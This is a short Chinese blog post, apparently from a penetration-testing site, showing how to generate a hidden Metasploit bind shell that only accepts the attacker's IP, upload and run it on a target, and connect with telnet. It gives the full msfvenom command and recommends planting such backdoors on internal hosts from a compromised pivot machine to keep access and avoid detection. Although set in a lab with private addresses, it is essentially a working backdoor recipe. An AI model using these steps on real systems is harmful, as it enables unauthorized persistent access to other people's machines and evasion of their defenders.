msf webshell(msf生成)

文章前言

有时候我们上传Shell到目标主机后,不仅我们自己可以连接,其他用户也可以连接,有时候会导致我们丢失该Shell,甚至该shell被用户发现并查杀,本篇文章我们将介绍如何通过Msfvenom来生成用户自己的专属Shell

实验环境

攻击主机:192.168.174.129

目标主机:192.168.174.170

其他主机:192.168.174.173

操作流程

Step 1:实验MSF生成隐藏Bind Shell

msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.174.129 -f exe > hidden_shell.exe

Step 2:之后将hidden_shell.exe通过一句话木马或者其他方式上传/下载到目标主机上并执行

msf webshell(msf生成)

Step 3:之后查看目标主机本地的8889端口是否开放

msf webshell(msf生成)

Step 4:之后使用同网段的其他主机链接该目标主机

telnet 192.168.174.170 8889

Step 5:使用攻击主机去链接

telnet 192.168.174.170 8889

文末思考

通过制作类似的专属Shell还有一个好处就是当你在内网渗透测试过程中拿下一台跳板机时,你可以利用这台跳板机生成一个正向木马并将其丢到内网的其他机器里面,之后随时可以通过Telnet获取到目标的shell

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34382.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月11日 上午11:28
下一篇 2024年4月11日 上午11:30

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注